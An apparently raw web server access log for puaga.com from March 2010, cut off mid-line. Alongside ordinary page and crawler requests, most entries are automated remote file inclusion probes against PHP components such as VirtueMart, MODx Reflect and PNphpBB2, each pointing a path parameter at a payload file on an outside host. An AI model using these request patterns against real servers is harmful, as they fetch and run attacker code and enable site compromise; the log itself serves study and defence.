79.76.26.225 - - [07/Mar/2010:10:20:08 -0800] "GET /images/PuagaSubLink_38472394873299.png HTTP/1.1" 200 33762 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:08 -0800] "GET /images/TL_Pixero_Hover.png HTTP/1.1" 200 4643 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:08 -0800] "GET /images/TL_Pixero.png HTTP/1.1" 200 4545 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:08 -0800] "GET /images/TL_Simple.png HTTP/1.1" 200 4682 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:08 -0800] "GET /images/TL_Simple_Hover.png HTTP/1.1" 200 4805 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:08 -0800] "GET /favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:08 -0800] "GET /images/PageBackSwills.jpg HTTP/1.1" 200 41348 "http://www.puaga.com/style/5.style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
118.217.5.166 - - [07/Mar/2010:10:20:12 -0800] "GET /logs/access_100217.log/myevent.php?myevent_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [07/Mar/2010:10:20:12 -0800] "GET /logs/access_100129.log/myevent.php?myevent_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:16 -0800] "GET /diger HTTP/1.1" 301 90 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:17 -0800] "GET /diger/ HTTP/1.1" 200 3545 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
79.76.26.225 - - [07/Mar/2010:10:20:23 -0800] "GET / HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
99.57.90.154 - - [07/Mar/2010:10:20:25 -0800] "GET /logs/access_100221.log///?_zb_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
99.57.90.154 - - [07/Mar/2010:10:20:25 -0800] "GET //?_zb_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
99.57.90.154 - - [07/Mar/2010:10:20:25 -0800] "GET /logs///?_zb_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:10:22:41 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:10:22:41 -0800] "GET /logs/access_100211.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:10:22:41 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [07/Mar/2010:10:22:50 -0800] "GET /index.php?option=http://car.sorabol.ac.kr/xe/files/.files/0?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.79" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:10:22:52 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:10:22:52 -0800] "GET /bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:10:22:52 -0800] "GET /logs/access_100211.log%20%20//bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:22:58 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:22:58 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:22:58 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:23:01 -0800] "GET /logs/access_100227.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:23:28 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:23:28 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:23:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:23:30 -0800] "GET /logs/access_100227.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [07/Mar/2010:10:23:45 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [07/Mar/2010:10:23:45 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [07/Mar/2010:10:23:46 -0800] "GET /logs/access_100211.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:10:23:52 -0800] "GET /logs/access_100214.log%20%20//bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [07/Mar/2010:10:26:11 -0800] "GET /logs/access_100225.log//write.php?dir=http://www.usher.co.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [07/Mar/2010:10:26:11 -0800] "GET /write.php?dir=http://www.usher.co.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [07/Mar/2010:10:26:12 -0800] "GET /logs//write.php?dir=http://www.usher.co.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:10:26:34 -0800] "GET /bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:10:26:34 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:10:26:34 -0800] "GET /logs/access_100214.log//bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [07/Mar/2010:10:26:38 -0800] "GET /logs/access_100221.log///?_zb_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [07/Mar/2010:10:26:38 -0800] "GET /logs///?_zb_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [07/Mar/2010:10:26:39 -0800] "GET //?_zb_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:10:26:50 -0800] "GET /logs/access_100207.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:26:59 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:26:59 -0800] "GET /logs/access_100221.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:26:59 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [07/Mar/2010:10:27:11 -0800] "GET /logs/access_100207.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:10:27:12 -0800] "GET /logs/access_100222.log//bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:27:15 -0800] "GET /logs/access_100129.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.206.36.25 - - [07/Mar/2010:10:27:54 -0800] "GET /logs/access_100214.log/http://bazyngan.at.ua/idx.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
195.206.36.25 - - [07/Mar/2010:10:27:55 -0800] "GET /http://bazyngan.at.ua/idx.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
195.206.36.25 - - [07/Mar/2010:10:27:56 -0800] "GET /logs/http://bazyngan.at.ua/idx.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
112.76.72.3 - - [07/Mar/2010:10:28:21 -0800] "GET /logs/access_100215.log%20%20/SSI.php?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [07/Mar/2010:10:28:21 -0800] "GET /logs/access_100201.log%20%20/SSI.php?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [07/Mar/2010:10:28:21 -0800] "GET /SSI.php?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [07/Mar/2010:10:28:21 -0800] "GET /logs/SSI.php?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:28:40 -0800] "GET /logs///////?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 4952 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:28:41 -0800] "GET //////?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:28:41 -0800] "GET /logs/access_100201.log%20%20///////?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:10:30:41 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:10:30:41 -0800] "GET /logs/access_100215.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:10:30:41 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:10:30:55 -0800] "GET /logs/access_100222.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:31:10 -0800] "GET /logs///////?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 4952 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:31:11 -0800] "GET //////?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:31:11 -0800] "GET /logs/access_100201.log%20%20///////?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:10:31:19 -0800] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:10:31:19 -0800] "GET /logs/access_100130.log///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:10:31:19 -0800] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:31:43 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:31:43 -0800] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:31:43 -0800] "GET /logs/access_100204.log%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [07/Mar/2010:10:31:50 -0800] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [07/Mar/2010:10:31:50 -0800] "GET /logs/access_100130.log///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [07/Mar/2010:10:31:50 -0800] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:32:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:32:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:32:39 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:32:41 -0800] "GET /logs/access_100227.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:33:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:33:07 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:33:08 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:10:33:09 -0800] "GET /logs/access_100227.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:33:17 -0800] "GET /logs/access_100204.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:33:34 -0800] "GET /logs/access_100226.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.108.150.235 - - [07/Mar/2010:10:34:34 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.puaga.com"
95.108.150.235 - - [07/Mar/2010:10:34:35 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Yandex/1.01.001 (compatible; Win16; H)" "puaga.com"
95.108.150.235 - - [07/Mar/2010:10:34:37 -0800] "GET / HTTP/1.0" 200 3626 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.puaga.com"
95.108.150.235 - - [07/Mar/2010:10:34:37 -0800] "GET / HTTP/1.0" 200 3626 "-" "Yandex/1.01.001 (compatible; Win16; H)" "puaga.com"
95.108.150.235 - - [07/Mar/2010:10:34:39 -0800] "GET / HTTP/1.1" 200 3642 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.puaga.com"
95.108.150.235 - - [07/Mar/2010:10:34:40 -0800] "GET / HTTP/1.1" 200 3642 "-" "Yandex/1.01.001 (compatible; Win16; H)" "puaga.com"
222.237.78.176 - - [07/Mar/2010:10:36:01 -0800] "GET /logs/access_100220.log%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [07/Mar/2010:10:36:01 -0800] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [07/Mar/2010:10:36:01 -0800] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [07/Mar/2010:10:36:11 -0800] "GET /logs/access_100130.log%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:10:36:38 -0800] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:10:36:38 -0800] "GET /logs/access_100220.log%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:10:36:38 -0800] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:10:36:51 -0800] "GET /logs/access_100130.log%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:10:36:58 -0800] "GET /logs/access_100221.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.183 - - [07/Mar/2010:10:40:13 -0800] "GET /logs/access_100129.log%20%20//classes/adodbt/sql.php?classes_dir=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.183 - - [07/Mar/2010:10:40:13 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.183 - - [07/Mar/2010:10:40:13 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.183 - - [07/Mar/2010:10:40:39 -0800] "GET /logs/access_100206.log%20%20//classes/adodbt/sql.php?classes_dir=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:10:41:47 -0800] "GET /logs/access_100131.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:10:41:47 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:10:41:47 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.165.149 - - [07/Mar/2010:10:42:23 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.solimantravel.com//micro_cms_files/images/panglima/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.165.149 - - [07/Mar/2010:10:42:23 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.solimantravel.com//micro_cms_files/images/panglima/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.165.149 - - [07/Mar/2010:10:42:23 -0800] "GET /logs/access_100211.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.solimantravel.com//micro_cms_files/images/panglima/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.165.149 - - [07/Mar/2010:10:43:39 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.solimantravel.com//micro_cms_files/images/panglima/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.165.149 - - [07/Mar/2010:10:43:39 -0800] "GET /logs/access_100211.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.solimantravel.com//micro_cms_files/images/panglima/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.165.149 - - [07/Mar/2010:10:43:40 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.solimantravel.c